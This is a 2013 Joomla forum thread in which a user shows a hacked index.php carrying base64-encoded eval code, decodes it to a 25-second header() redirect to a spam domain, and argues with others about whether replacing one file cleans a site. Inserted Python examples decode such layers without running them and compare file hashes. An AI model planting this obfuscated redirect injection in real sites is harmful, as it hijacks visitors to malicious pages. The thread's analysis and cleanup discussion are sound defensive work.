[removed] redirect index.php hacked

prophotodx
Joomla! Intern
Posts: 76
Joined: Tue Feb 23, 2010 5:36 pm

[removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 3:29 pm

Someone hacked one of my client's websites by changing the index.php file in the Joomla root. The site was redirecting after 25 seconds to shopforza .info which was somehow going to [spam].com. I started scanning some files for changed dates and found that /index.php was changed. I opened it and it was Base64 encoded which was a red flag since Joomla is open source.

Code:

<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>
That gets decoded to

Code:

define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
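// Injected line, not part of the stock Joomla index.php: decodes to the header() call shown further down
eval(base64_decode('aGVhZGVyKCJSZTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));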
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

$mainframe =& JFactory::getApplication('site');

$mainframe->route();

echo JResponse::toString($mainframe->getCfg('gzip'));

Which also has more encoding which decodes to

Code:

header("Refresh: 25; url=\"http://shopforza .info/net\"");
Hopefully this will help someone get their site back and future reference...
Last edited by mandville on Tue Jan 22, 2013 5:11 pm, edited 2 times in total.
Reason: trimmed code, broke links, trimmed hack script.
Why are there so many d-bags around here? Joomla is about community AND a CMS! Don't be a d-bag, explain how to fix the person's issue not just 'go look here and read xyz.com'.

Remember, there is a PERSON behind that username that NEEDS HELP!
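
Added example, not part of the original post: a Python scanner that decodes nested eval(base64_decode('...')) layers as text only, never executing them, and flags a decoded header() redirect like the one shown in the post above. The sample file is constructed with a placeholder URL, and all function names are this example's own.

```python
import base64
import binascii
import re
from pathlib import Path

# eval(base64_decode('...')), either quote style; group 2 is the blob.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# header() calls that send the browser elsewhere, like the decoded payload above.
REDIRECT = re.compile(r"header\s*\(\s*['\"]\s*(?:Refresh|Location)\s*:", re.I)
MAX_LAYERS = 10  # stop on absurd nesting


def peel(source):
    """Decode nested eval(base64_decode()) layers as text. Nothing is executed."""
    layers, current = [], source
    for _ in range(MAX_LAYERS):
        match = EVAL_B64.search(current)
        if not match:
            break
        try:
            raw = base64.b64decode(match.group(2))
        except (binascii.Error, ValueError):
            break  # truncated or corrupt blob: keep the layers decoded so far
        current = raw.decode("utf-8", errors="replace")
        layers.append(current)
    return layers


def analyse(source):
    layers = peel(source)
    return {"layers": len(layers),
            "redirect": any(REDIRECT.search(text) for text in layers),
            "final": layers[-1] if layers else ""}


def scan_tree(root):
    """Map each .php file under root that holds an encoded eval to its analysis."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        result = analyse(path.read_text(encoding="utf-8", errors="replace"))
        if result["layers"]:
            hits[path.relative_to(root).as_posix()] = result
    return hits


def wrap(php):
    """Build one encoded layer for the constructed sample below."""
    return "eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()

# Constructed sample with the post's two-layer shape and a placeholder URL.
INNER = 'header("Refresh: 25; url=\\"http://redirect.example.invalid/net\\"");'
MIDDLE = "define( '_JEXEC', 1 );\n" + wrap(INNER) + "\n$mainframe->route();"
SAMPLE_INDEX = "<? " + wrap(MIDDLE) + "?>"
CLEAN_INDEX = "<?php\ndefine( '_JEXEC', 1 );\n$mainframe->route();\n"
```

Calling scan_tree() on a downloaded copy of the site lists every PHP file carrying the same wrapper, not only index.php.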

Re: [spam].com redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 3:32 pm

This forum's filter is removing the site name which could be important for SEO. My client's site was being redirected to [spam] (dot) com, [spam].com, [spam] .com. I am not spamming! This could help someone find their compromised files quicker and fix their website.

BTW the site was running joomla 1.5.26.

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: [removed] redirect index.php hacked

Post by mandville » Tue Jan 22, 2013 5:14 pm

please follow the forum stickie regarding posting the fpa to assist us in assisting you.

Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 5:59 pm

mandville wrote:please follow the forum stickie regarding posting the fpa to assist us in assisting you.
Huh? Why? I am posting a solution, not a question. I found out why my site was being redirected and how. I posted this hoping to help someone else.
mandville wrote: Regarding your complaint that the forum censor acting properly. how would the hacked site url be relevant and a boost for seo? there is no moral value in promoting /sending someone to a hacked site.
Following the forum stickie and checklist 7 is a great start for getting a hacked site repaired quickly.
If someone searched for "joomla 1.5 redirect xyz.com" or "joomla 1.5 hacked xyz.com" this post should come up, simple SEO. Obviously that would require the correct domain name to be listed, which your filters are preventing.

Re: [removed] redirect index.php hacked

Post by mandville » Tue Jan 22, 2013 7:44 pm

i can not see how your post actually resolved the hijack/hack etc. if you had searched online you would have found that both the links you posted (including the url in the topic title which is not permitted under forum rules) would have led the unwary/inquisitive to a malware dropping site including several resolutions to the browser hijack.

from experience "most" people would not search, they would post a help - hacked topic. which of course still leaves the fact you posted direct links to malware dropping sites. now you know the reason they are censored on this forum.

how did you resolve your client's hack?

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 7:48 pm

mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.

Webdongle
Joomla! Master
Posts: 44024
Joined: Sat Apr 05, 2008 9:58 pm

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 8:33 pm

prophotodx wrote:
mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.
That is equivalent to repainting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

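Added example, not part of the thread: one way to look for the "other damage" mentioned above is to hash every file on the site and compare it with a fresh copy of the same Joomla release. The directory layout and file names below are constructed for the demonstration, and the function names are this example's own.

```python
import hashlib
import tempfile
from pathlib import Path


def manifest(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(site_root, clean_root):
    """Classify site files against a clean copy of the same release."""
    site, clean = manifest(site_root), manifest(clean_root)
    return {
        "modified": sorted(f for f in site if f in clean and site[f] != clean[f]),
        "extra": sorted(f for f in site if f not in clean),
        "missing": sorted(f for f in clean if f not in site),
    }


def extra_php(report):
    """Extra files the web server would execute are the ones to review first."""
    return [f for f in report["extra"] if f.lower().endswith(".php")]


def build_demo(base):
    """Constructed trees: a clean copy, and a site with one edit and three extras."""
    clean, site = Path(base, "clean"), Path(base, "site")
    stock = {"index.php": "<?php /* stock */",
             "includes/defines.php": "<?php /* defines */"}
    for root in (clean, site):
        for rel, body in stock.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
    (site / "index.php").write_text("<?php /* altered */")
    (site / "configuration.php").write_text("<?php /* site settings, expected */")
    (site / "images").mkdir()
    (site / "images" / "unexpected.php").write_text("<?php /* not in the release */")
    (site / "images" / "logo.png").write_bytes(b"\x89PNG constructed")
    return site, clean


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        report = compare(*build_demo(tmp))
        print(report, extra_php(report))
```

Legitimate extras such as configuration.php and installed extensions will appear in the report, so the output is a review list rather than a verdict, and it says nothing about changes made in the database.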

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 8:37 pm

Webdongle wrote:
prophotodx wrote:
mandville wrote:how did you resolve your clients hack?
Um, replaced index.php with a non hacked version...thought that was obvious.
That is equivalent to re painting one wall after someone broke into a building and trashed the place. It does nothing to fix other damage and it does nothing to secure the site to prevent it happening again.
The site has been secured, at least as secure as a 1.5 site can get. It wasn't done before, that's why it happened.

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 9:16 pm

prophotodx wrote:...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 9:28 pm

Webdongle wrote:
prophotodx wrote:...
The site has been secured... It wasn't done before thats why it happened.
But because you have not deleted all the files then it is not certain the site is secure. You may have looked for other hacked files and not seen any ... but that does not mean they are not there. The only way to be certain is delete all the files and replace with fresh ones.
I don't understand why you are arguing with me...SITE HAS BEEN SECURED, THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 9:57 pm

prophotodx wrote:...
I don't understand why you are arguing with me...SITE HAS BEEN SECURED...
I am not arguing with you I am telling you a fact. Unless all the files have been deleted then it is not 100% certain the site is secure. It is you that is shouting.

prophotodx wrote:...
THIS IS A POST FOR FUTURE REFERENCE FOR OTHERS...
And that is why the facts must be told. Unless all the files have been deleted then it is not 100% certain the site is secure. On large sites with professional IT staff it is possible to be reasonably sure using other methods. But this forum has many inexperienced users(some even have to be told how to copy/paste). To start a thread as a 'future reference for others' and only state that replacing the "index.php with a non hacked version" ... is at the least very irresponsible.

To start such a thread after making c. 40 posts and asking basic questions is [spam]. If you wish to ignore the advice on http://forum.joomla.org/viewtopic.php?f=432&t=475313 that is up to you. But to make c. 40 posts (that clearly show your lack of knowledge) then give bad advice ... needs to be addressed for the sake of the inexperienced users who read this thread.

Re: [removed] redirect index.php hacked

Post by prophotodx » Tue Jan 22, 2013 10:17 pm

Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob when they don't even know me. All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.

Re: [removed] redirect index.php hacked

Post by Webdongle » Tue Jan 22, 2013 10:50 pm

prophotodx wrote:Amazing how someone who is supposed to be helping is only continuing to argue with me and tell me I'm a noob ...
I am not arguing with you and I am not arguing with you. I am stating a fact that many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.


prophotodx wrote:... All you had to say was 'for others with this issue be sure to read through this thread xxxxx.xxxxx to be sure your site is secure' instead of defaming me.
I explained why it was necessary to delete all the files. And explained that there are other methods that experienced IT experts can use. Also I explained that your method was not suitable for inexperienced users.

I did not 'defame' you ... all I did was point out you make c. 40 posts asking basic questions then start a thread that has inaccurate and incomplete information.

You are the one that is arguing, you argue when an experienced moderator has the need to edit your posts. And you argue 'black is white' when the facts are placed in front of you. Then you accuse me of just pointing to a 'sticky' thread.

The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.

Re: [removed] redirect index.php hacked

Post by prophotodx » Wed Jan 23, 2013 4:20 pm

Webdongle wrote:I am not arguing with you and I am not arguing with you. I am stating a fact that many of the users on the forum are inexperienced ... and that it is irresponsible for you to suggest that replacing the index.php file makes the site secure.
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.

Webdongle wrote: The crux of the matter is that you posted information that was not accurate and could mislead inexperienced users to ignore the most effective method. My posts were(and are not) personal attacks on you. My posts are for the inexperienced users who may have read your posts so they could see the flaws in the logic of what you posted.
I consider it a personal attack which is not how an 'experienced moderator' should act. Your actions and attitude are a poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.

Re: [removed] redirect index.php hacked

Post by Webdongle » Wed Jan 23, 2013 4:54 pm

prophotodx wrote:...
Just the fact that you continue to post and argue that you are not arguing shows your need to be right. Stop posting and then the argument will be over.
...
Stating facts is not arguing it is debating a point. And the point is the advice you posted was incorrect, inaccurate and misleading to inexperienced users. Your other posts do nothing to qualify your statement and only try to confuse the issue by evading the main point.


prophotodx wrote:...
I consider it a personal attack which is not how an 'experienced moderator' should act. Your actions and attitude are a poor reflection on the joomla community and this forum. No wonder people hate posting here hoping for help, even the mods have a bad attitude.
A difference of opinion is not a personal attack it is just a different opinion ... no more no less. The fact that you take objection with someone having a different opinion to yours is a reflection on you not anyone else. As for you claiming people hate posting here ... The amount of posts(especially solved posts) proves your statement incorrect.

Again(for the inexperienced users who read this thread) ... just replacing the index.php file is not enough to remove the hack and secure the site. Before you post please read this gives specific instructions on how to do that.

There are similar instructions for 2.5 http://forum.joomla.org/viewtopic.php?f=621&t=582854 and 3.0 http://forum.joomla.org/viewtopic.php?f=714&t=757645

Re: [removed] redirect index.php hacked

Post by prophotodx » Wed Jan 23, 2013 4:56 pm

hey look webdongle still can't leave this alone!!! That's a great mod for you...

Re: [removed] redirect index.php hacked

Post by mandville » Wed Jan 23, 2013 6:08 pm

degenerating topic locked
webdongle is not a moderator nor does he claim to be